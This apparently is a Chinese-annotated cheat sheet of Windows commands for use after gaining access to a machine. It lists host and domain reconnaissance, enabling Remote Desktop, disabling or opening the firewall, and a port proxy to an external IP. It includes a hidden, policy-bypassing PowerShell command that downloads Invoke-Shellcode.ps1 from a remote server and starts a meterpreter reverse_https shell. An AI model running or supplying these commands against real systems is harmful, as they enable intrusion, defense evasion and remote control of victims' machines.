- basic
- cd /d d:\tool #cmd切换盘符
- hostname #主机名
- systeminfo #系统信息
- echo %PROCESSOR_ARCHITECTURE% #系统架构
- net statistics workstation #主机开机时间
- schtasks /query /fo LIST /v #查看所有计划任务
- quser #当前在线用户
- net view /domain #查看域
- net config workstation #查看当前计算机名,全名,用户名,系统版本,工作站域,登录的域
- nltest /domain_trusts #域的信任关系
- 注册表相关
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开启远程桌面
- wmic
- wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 #开启远程桌面
- wmic qfe get Caption,Description,HotFixID,InstalledOn #补丁列表
- wmic useraccount get /all #可以获取到域用户的用户名、描述信息、SID、域名、状态等
- wmic product get name,version 查看当前安装的软件姓名版本
- wmic service lsit 列出服务
- wmic startup get command,caption 查看启动项
- powershell
- PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString(“http://…/Invoke-Shellcode.ps1”);
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost ip -Lport port
#从网站服务器中下载脚本,绕过本地权限并隐藏执行
- PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString(“http://…/Invoke-Shellcode.ps1”);
- netsh
- netsh firewall show state #防火墙状态
- netsh firewall show config #查看防火墙配置
- netsh firewall set opmode disable #关闭防火墙(windows server 2003及以前)
- netsh advfirewall set allprofiles state off #关闭防火墙(windows server 2003以后)
- netsh firewall add allowedprogram c:\xxx\xx.exe “allow xx” enable #允许指定程序的全部连接(windows server 2003及以前)
- netsh advfirewall firewall add rule name=”pass xx” dir=in action=allow program=”C:\xxx\xx.exe” #允许某个程序连入
- netsh advfirewall firewall add rule name=”pass xx” dir=out action=allow program=”C:\xxx\xx.exe” #允许某个程序外连
- netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow #开启3389端口,允许改端口放行
- Netsh advfirewall firewall delete rule name=zhongzhuan #删除策略
- netsh interface portproxy add v4tov4 listenport=3334 connectaddress=117.50.179.15 connectport=3334